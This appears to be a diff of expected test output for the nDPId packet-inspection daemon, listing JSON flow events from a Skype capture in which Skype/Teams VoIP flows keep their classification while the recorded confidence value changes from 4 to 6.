-00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969668393,"flow_last_seen":1431969668393,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969713813,"flow_last_seen":1431969713813,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.62.0.85","src_port":13021,"dst_port":33647,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.168","src_port":13021,"dst_port":40007,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969669408,"flow_last_seen":1431969669408,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.43","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969672489,"flow_last_seen":1431969672489,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.19","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969655399,"flow_last_seen":1431969655399,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.24","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969668393,"flow_last_seen":1431969668393,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969713813,"flow_last_seen":1431969713813,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.62.0.85","src_port":13021,"dst_port":33647,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.168","src_port":13021,"dst_port":40007,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1431969717899,"flow_last_seen":1431969784849,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":405,"flow_tot_l4_payload_len":1085,"flow_avg_l4_payload_len":90,"midstream":1,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"17.143.160.22","dst_ip":"192.168.1.34","src_port":5223,"dst_port":49447,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969655400,"flow_last_seen":1431969655400,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.48","src_port":13021,"dst_port":40008,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969688514,"flow_last_seen":1431969688514,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.159","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969670418,"flow_last_seen":1431969670418,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.32","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.172","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969677439,"flow_last_seen":1431969677439,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.166","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969713813,"flow_last_seen":1431969713813,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"176.97.100.249","src_port":13021,"dst_port":26635,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969682488,"flow_last_seen":1431969682488,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.28","src_port":13021,"dst_port":40014,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.154","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969684467,"flow_last_seen":1431969684467,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.40","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969679455,"flow_last_seen":1431969679455,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.176","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969676429,"flow_last_seen":1431969676429,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.165","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.141","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969685484,"flow_last_seen":1431969685484,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.31","src_port":13021,"dst_port":40021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969667440,"flow_last_seen":1431969667440,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.143","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.17","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969657368,"flow_last_seen":1431969657368,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.153","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969686494,"flow_last_seen":1431969686494,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.29","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969655400,"flow_last_seen":1431969655400,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.42","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.15","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969655400,"flow_last_seen":1431969655400,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.48","src_port":13021,"dst_port":40008,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969688514,"flow_last_seen":1431969688514,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.159","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969670418,"flow_last_seen":1431969670418,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.32","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.172","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969677439,"flow_last_seen":1431969677439,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.166","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969713813,"flow_last_seen":1431969713813,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"176.97.100.249","src_port":13021,"dst_port":26635,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969682488,"flow_last_seen":1431969682488,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.28","src_port":13021,"dst_port":40014,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.154","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 